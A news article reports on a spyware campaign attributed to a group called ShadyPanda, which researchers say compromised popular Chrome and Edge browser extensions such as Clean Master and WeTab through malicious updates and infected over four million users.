Spyware infects 4 million users after popular browser extensions go rogue

Cybersecurity researchers have uncovered a highly advanced malware operation that infected millions of computers via browser extensions hosted on the Chrome Web Store and the Microsoft Edge add-ons site. These extensions initially appeared as legitimate apps but were altered with malicious code during their updates last year.

Researchers from cybersecurity firm Koi report that a China-based hacking group known as ShadyPanda is actively running at least two separate malware campaigns by embedding malicious code into browser extensions.

The first campaign includes at least five extensions that operated normally for about five years before being compromised. One example is Clean Master, a cache-cleaning tool with over 200,000 users that previously had both the Featured and Verified badges on the Chrome Web Store. Google has since removed it.

The second campaign features five more extensions, including WeTab, a tab management tool with over 3 million users. Together, these extensions are used by more than four million people worldwide. Unlike Clean Master and the other compromised extensions from the first campaign, all five from this second group are still available on the Microsoft Edge Add-ons site.

According to the researchers, malicious code was inserted into these extensions in 2024, effectively transforming them into spyware that secretly collected users’ browsing data. The gathered information was sent in real time to external servers located in China.

The researchers explained that the compromised extensions collectively acted as a remote code execution system, enabling attackers to automatically download and run JavaScript inside the browser without any user approval. They estimate that more than 4.3 million devices have been infected.

ShadyPanda’s first documented attack occurred in 2023, although the group is thought to have been active since at least 2018. Its earliest major operation involved affiliate fraud, where malicious apps embedded affiliate-tracking links into users’ shopping clicks to gather data on their purchasing habits.

The group later increased its reach by pushing malicious updates to existing extensions, thus avoiding detection. According to the researchers, ShadyPanda was able to distribute the malware with relative ease because Google does not review updates to existing extensions as thoroughly as it evaluates newly submitted ones.